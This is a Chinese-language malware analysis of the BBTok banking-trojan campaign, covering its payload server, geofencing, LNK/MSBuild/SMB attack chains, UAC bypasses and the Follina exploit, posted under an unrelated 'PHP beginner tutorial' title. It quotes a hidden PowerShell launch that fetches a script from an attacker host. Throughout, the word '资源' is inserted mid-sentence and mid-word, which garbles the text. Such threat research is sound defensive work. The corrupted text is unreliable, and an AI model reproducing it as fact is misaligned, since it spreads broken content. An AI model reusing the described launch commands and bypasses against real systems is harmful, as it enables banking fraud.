php初级入门教程
Check Point Research 研究人员最近在拉丁美洲发现了一个活跃活动,该活动正在操作和部署 BBTok 银行软件的新变体在这项研究中,我们会介绍新发现的攻击链,这些攻击资源链使用了一种独特的 Living off the land Binaries 组合,所以,尽管 BBTok 银行软件至少从 2020 年开始活跃,但时至今日,被检测到的概率还是很低。
在分析该活动时资源,研究人员发现了一些攻击者在攻击中使用的服务器端资源,目标是巴西和墨西哥的数百名用户服务器端组件负责提供可能通过网络钓鱼链接传播的恶意有效负载我们已经观察到相同的服务器端脚本和配置文件的多次迭代,这些资源脚本和配置文件展示了 BBTok 银行软件部署方法随着时间的推移而演变的过程。
这我们得以一窥攻击者尚未实现的攻击媒介,并追踪用于维持此类操作的源代码的起源我们将在本文重点介绍用于传播银行软件的有效负载资源服务器的一些服务器端功能,它们可以为每个受害者产生独特的有效负载发现过程BBTok 异常活跃,针对巴西和墨西哥的用户,采用多层地理围栏来确保受攻击的设备仅来自这些国家。
自 2020 年 BBTok 最资源后一次公开报道以来,运营商的技术、战术和程序 ( TTPs ) 发生了重大变化,增加了额外的混淆层和下载器,从而使检测率降到最低BBTok 银行有一个专门的功能,可以复制 40 多家墨西哥和巴西银行的资源界面,并欺骗受害者将其双重身份验证代码输入他们的银行账户或输入他们的支付卡号。
新识别的有效负载是由自定义服务器端应用程序生成的,该应用程序负责根据操作系统和位置为每个受害者生成唯一的有效负载对有效负载资源服务器端代码的分析显示,攻击者正在积极维护不同版本 Windows 的多样化攻击链,这些链使用各种各样的文件类型,包括 ISO, ZIP, LNK, DOCX, JS 和 XLL。
攻击者在他们的武器库资源中添加开源代码、来自黑客论坛的代码和新的漏洞(例如 Follina)BBTok 银行软件历史BBTok 银行软件于 2020 年首次被披露,通过无文件攻击部署在拉丁美洲其功能非常齐全,包括枚举和终止进资源程、键盘和鼠标控制以及操作剪贴板内容。
除此之外,BBTok 还包含经典的银行木马功能,模拟在墨西哥和巴西运营的各种银行的虚假登录页面自从首次被公开披露以来,BBTok 运营商已经采用了新的 https资源,同时仍然主要利用带有附件的网络钓鱼电子邮件进行初始攻击。
最近,我们看到了银行软件通过网络钓鱼链接传播的迹象,而不是作为电子邮件本身的附件在访问恶意链接时,会将 ISO 或 ZIP 文件下载到受害者的资源计算机上,这些文件包含一个启动攻击链的 LNK 文件,在打开一个诱饵文件的同时,导致银行软件的部署。
虽然乍一看,这个过程似乎很简单,但幕后操作非常复杂在分析这些新发现的链接时,研究人员发现了用于传播恶资源意软件的内部服务器端资源很明显,攻击者保持了广泛的攻击链,每次点击都根据需要生成,并根据受害者的操作系统和位置进行定制。
BBTok 银行攻击BBTok 为其运营商提供了广泛的功能,从远程命令到经典的银资源行木马功能,BBTok 可以复制多家拉美银行的界面其代码引用了墨西哥和巴西的 40 多家主要银行,如花旗银行、丰业银行、Banco Ita ú 和汇丰银行。
银行软件通过遍历打开的窗口和浏览器选项卡的名资源称,搜索银行名称,来寻找受害者是这些银行客户的迹象其默认目标显然是西班牙对外银行 ( BBVA ) ,其默认的虚假界面旨在复制其外观这些虚假的界面冒充合法机构,诱使毫无戒心的用户泄露个人和财务信息,该资源功能的重点是诱骗受害者输入作为银行账户密码,并接管受害者的银行账户。
嵌入 BBTok 银行软件中的虚假接口示例BBTok 是用 Delphi 编写的,它使用可视化组件库 ( VCL ) 来创建表单,毫资源不夸张地说,这些表单形成了这些虚假的界面,这使得攻击者可以动态、自然地生成适合受害者电脑屏幕的界面和受害者银行的特定形式而不会引起怀疑。
作为银行软件的默认目标银行,西班牙对外银行 ( BBVA ) 将资源其接口存储在一个名为 "TFRMBG" 的表单中,除了银行网站,攻击者也开始在受攻击的设备上搜索有关比特币的信息,积极寻找 "bitcoin", "Electrum" 和 "binance" 等字符串资源。
除此之外,BBTok 还可以安装恶意浏览器扩展或注入名为 "rpp.dll" 的 DLL 来进一步控制受攻击的系统,并可能提高其欺骗受害者的能力值得注意的是,该攻击者采取了谨慎的方式 所有的银行资源活动都是在其 C2 服务器的直接命令下执行的,而不是在每个受攻击的系统上自动执行。
负载服务器分析为了有效管理他们的活动,BBTok 运营商创建了一个独特的流程,由受害者点击恶意链接启动,该链接可能是通资源过钓鱼电子邮件发送的当受害者点击链接时,会根据受害者的操作系统下载 ZIP 文件或 ISO 映像。
这个过程对受害者来说是无感的,但服务器会根据请求中找到的参数生成唯一的有效负载BBTok 攻击中使用的资源服务器端组件此过程在基于 xampp 的服务器上执行,包含三个基本组件:一个 PowerShell 脚本,用于处理有效负载准备,并包含创建 lure 文档的主要逻辑;
一个 PHP 代码库和数据库,用于资源记录和管理攻击;增强这些组件功能的辅助实用程序具体流程如下:受害者向 /baxar、/descargar 或 /descarga 执行 HTTP 请求(这些路径表明诱饵是西班牙语或葡萄牙语);。
基于 资源.htaccess 文件,服务器使用 descarga.php 处理请求;脚本利用文件 db.php 通过 SQLite 数据库存储有关请求的信息,包括受害者的信息;Desarga.php 调用 ps资源_gen.ps1 来生成一个自定义文档,该文档最终会传递给受害者。
传入请求处理PHP 代码库由以下文件组成:1.descarga/descargar.php:管理新的连接并向受害者的电脑提供引诱文档2资源.db.php:生成并管理包含受害者详细信息的 SQLite 数据库。
3.generator.php:用于生成随机链接、字符串和其他功能的实用程序类4."Descarga" 和 "descargar"资源 在西班牙语中翻译为 "download"此文件包含感染过程的主要逻辑脚本本身包含许多评论,其中一些是纯西班牙语和葡萄牙语,这些评论暗示了攻击者的来源。
脚本逻辑:1. 它根据 ip-api.com 检资源查链接引用的受害者的地理位置,并将其存储在文件中如果受害者不是来自目标国家 ( 例如,墨西哥或巴西 ) ,则 HTTP 连接立即以 404 消息结束2. 如果受害者通过了检查,则脚本解析用户代理以获取资源受害者的 Windows 操作系统版本。
3. 然后,它将带有受害者的国家 / 地区代码和引诱文件名的用户代理传递到 PowerShell 有效负载生成器脚本PowerShell 负载生成器脚本 ps_资源gen.ps1 包含用于生成 ZIP 或 ISO 文件形式的文档有效负载的主要逻辑。
最新版本的代码有很多失效的部分,这部分在过去可能是有效的,这表明它们包含额外的感染链和诱饵,我们发现了该文件的多个版资源本,其中一些可以追溯到 2022 年 7 月,这表明该活动已经进行了很长一段时间生成器脚本由 descarga.php 调用,使用带有参数 file_name、ver 和 cc 的函数 Downloa资源dFile,这些对应于生成的文档名称、受害者的操作系统版本和受害者的国家代码。
在观察到的服务器迭代中使用的代码部分基于两个参数生成文档有效负载:受害者的国度:巴西或墨西哥;从 User-Agent 中资源提取的操作系统:Windows 10 或 7;根据结果,选择恶意文档的以下参数:
文件类型:Windows 10 为 ISO, Windows 7 为 ZIP;下一阶段使用的 DLL 文件的名称根据目标资源国家的不同而变化:Trammy 用于巴西,Gammy 用于墨西哥该文档包含一个链接:Windows 10 中的 LNK 快捷图标是 Microsoft Edge 使用的快捷图标,Windows 7 中资源的 LNK 快捷图标是 Google Chrome 使用的快捷图标。
最后的执行逻辑:对于 Windows 10 受害者,该脚本使用来自服务器 216 [ . ] 250 [ . ] 251 [ . ]资源 196 的名为 dat.xml 的文件执行 MSBuild.exe,该文件还存储下一阶段的恶意 DLL。
对于 Windows7,负载只是通过 CMD 执行下载相关的远程 DLL添加位置混淆所有有资源效载荷都使用 Add-PoshObfusion 函数进行模糊处理对部分代码的简单搜索会从 " 良性 " 网站 hackforums [ . ] net 中得到一个结果,特别是 2021 年 8 月一位资源名为 "Qismon" 的用户的回复,其还推荐了一些绕过 AMSI 和安全产品的方法,并分享 PoshObfusion 代码:。
在 hackforums [ . ] net 中共享的 Add-Posh资源Obfuscation ( ) 代码攻击链和最终有效负载上面描述的过程最终导致了两个攻击链的变体:一个针对 Windows 7,一个针对 Windows 10。
两个版本之间的差异可以解释为试图避免新实资源现的检测机制,如 AMSI*ammy.dll 下载程序两个感染链都使用使用类似约定命名的恶意 DLL —— Trammy、Gammy、Brammy 或 Kammy。
后者是 BBTok 加载程序的精简和资源混淆版本,在执行任何恶意操作之前使用地理围栏来阻止检测最后的有效负载是一个新版本的 BBTok 银行程序如上所述,BBTok 附带了多个额外的密码保护软件这些漏洞允许攻击者完全访问受攻击的设备和其他功资源能。
Windows 7 攻击链Windows 7 攻击链Windows 7 的攻击链不是唯一的,它由存储在 ZIP 文件中的 LNK 文件组成在执行 LNK 文件时,使用 rundll32.exe 运资源行 * my.dll 负载,rundll32.exe 依次下载、提取和运行 BBTok 负载。
Windows 10 攻击链Windows 10 攻击链Windows 10 的攻击链存储在一个包含 3 资源个组件的 ISO 文件中:一个 LNK 文件,一个 lure 文件和一个重命名的 cmd.exe 可执行文件。
点击 LNK 文件启动攻击链,使用重命名的 cmd.exe 以以下方式运行所有命令:攻击链资源将 lure 文件复制到文件夹 %userprofile% 并打开它在 BBTok 攻击中释放的 Lure 文件。
运行 MSBuild.exe,使用存储在远程服务器上的 XML ( 通过 SMB 获取资源 ) 构建应用程序MSBuild.exe 创建一个随机命名的 DLL,它反过来从服务器下载 * my. DLL,并以重命名的 rundll32.exe ( mmd.exe ) 运行它,如 XML 内容资源所示:。
dll 下载程序下载、提取并运行 BBTok 负载重命名 CMD、MSBuild 和通过 SMB 获取文件的独特组合导致 Windows 10 攻击链很少被检测到早期版本在对 BBTok 活动资源的分析中,研究人员遇到了来自有效负载服务器的多个版本的工件。
我们看到 PHP 代码、PowerShell 脚本和其他实用程序都发生了变化PHP 代码的变化查看 descarga.php 脚本的早期版本资源,我们看到了一些关键的差异:最初,只有来自墨西哥的受害者会成为攻击目标。
另一个有效负载服务器 176 [ . ] 31 [ . ] 159 [ . ] 196 的 IP 在脚本中进行了硬编码这里没有直资源接执行 PowerShell 脚本,而是调用了一个名为 gen.php 的脚本。
虽然研究人员无法获得这个脚本,但相信它只是执行了 PowerShell 脚本使用 db.php 文件将受害者的 IP 地资源址、用户代理和标志 ( jaBaixou,即葡萄牙语中的 " 已下载 " ) 插入数据库中。
稍后检查该标志,以确保不会提供相同的有效负载由于最新版本中未使用此部分,攻击者可能发现此过程繁琐,并决定用 资源OPSEC 来换取更容易的管理和更高的攻击成功几率PowerShell 脚本修改说明查看 PowerShell 脚本的旧版本,可以清楚地看到对负载和执行链进行了大量更改。
在最早版本的脚本中,LNK 只资源是运行一个 PowerShell 脚本,其参数为 -ExecutionPolicy Unrestricted-W hidden-File\%PARAM% [ . ] supplier [ . ] se资源rveftp [ . ] netfilesasd.ps1。
后来的更新添加了 lure PDF,fac.PDF("fac" 是 "factura" 的缩写,在葡萄牙语中是 " 发票 ")这是来自墨西哥科资源利马县的合法西班牙语收据此外,Windows7 受害者的有效负载启动了一个合法的墨西哥政府网站 hxxps://failover [ . ] www [ . ] gob [ . ] mx/mateni资源miento.html。
研究人员发现的最新版本打开了一个不同的合法网站 hxxps://fazenda [ . ] gov [ . ] br,巴西政府网站此版本还更改了 MSBuild 使用的 XML资源 文件,并将为巴西目标保留的 DLL 名称从 Brammy.DLL 更改为 Trammy.DLL。
未使用的代码和感染媒介PowerShell 脚本中的某些代码部分未使用,服务器托管的文件不属于我们讨论资源的主要感染流特别是,研究人员没有发现任何积极使用以下内容的迹象:ze.docx 是一份利用 Follina CVE(2022-30190)的文档。
PowerShell 脚本中名为 CreateDoc 资源的函数中引用了它CreateXLL 引用的 xll.xll 是从开源项目中获取的恶意 xllhttps://github.com/moohax/xllpoc,通过 Excel 实现代码执行。
在服务器上资源发现了许多空的 JavaScript 文件,这些文件很可能被名为 CreateJS 的函数使用函数 b.js 中引用的文件是空的,因此不清楚该函数以前是使用过还是从未完全实现过服务器上有多个 bat 资源文件,每个文件都有不同的下载下一阶段的实现。
这些很可能是由名为 CreateBat 的函数创建的,该函数在最新版本的 PowerShell 脚本中被取消掉了它们中的大多数几乎与我们之前分析的 ByFD资源 函数中的代码相同,不包括过去两次值得注意的迭代:。
最旧的 bat 文件下载了另一个 PowerShell 脚本作为下一阶段(该脚本不再公开),而不是编辑注册表;稍后的 bat 文件使用了 fodhe资源lper UAC 绕过,而不是当前正在使用的 computerdefaults 绕过。
受害者分析研究人员对服务器端组件的分析也揭示了最近的一个活动,,从攻击者的角度来看,这是基于他们发现的一个数据库,资源该数据库记录了对恶意应用程序的访问该数据库名为 links.sqlite,非常简单它包含 150 多个条目,所有条目都是唯一的,表头与 db.php 创建的条目相对应。
chave 或 key;as资源sunto 或 subject;user_agent ;baixou 或 downloaded名为 chave 的列包含受害者的 IP 地址,而 assunto 列为空:。
Links.sqlite 数资源据库 攻击区域由于除了攻击者之外,任何人都不会看到服务器代码,并且其中包含大量葡萄牙语评论,我们认为这表明攻击者很可能是巴西人,巴西人以其活跃的银行恶意软件生态系统而闻名总结
尽管 BBTok 目前仅资源在巴西墨西哥活动,但很明显,它仍在积极开发中由于其众多功能,以及涉及 LNK 文件、SMB 和 MSBuild 的独特而创造性的传播方法,它仍然对该地区的组织和个人构成威胁查看原文
亲爱的读者们,感谢您资源花时间阅读本文。如果您对本文有任何疑问或建议,请随时联系我。我非常乐意与您交流。
发表评论:
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。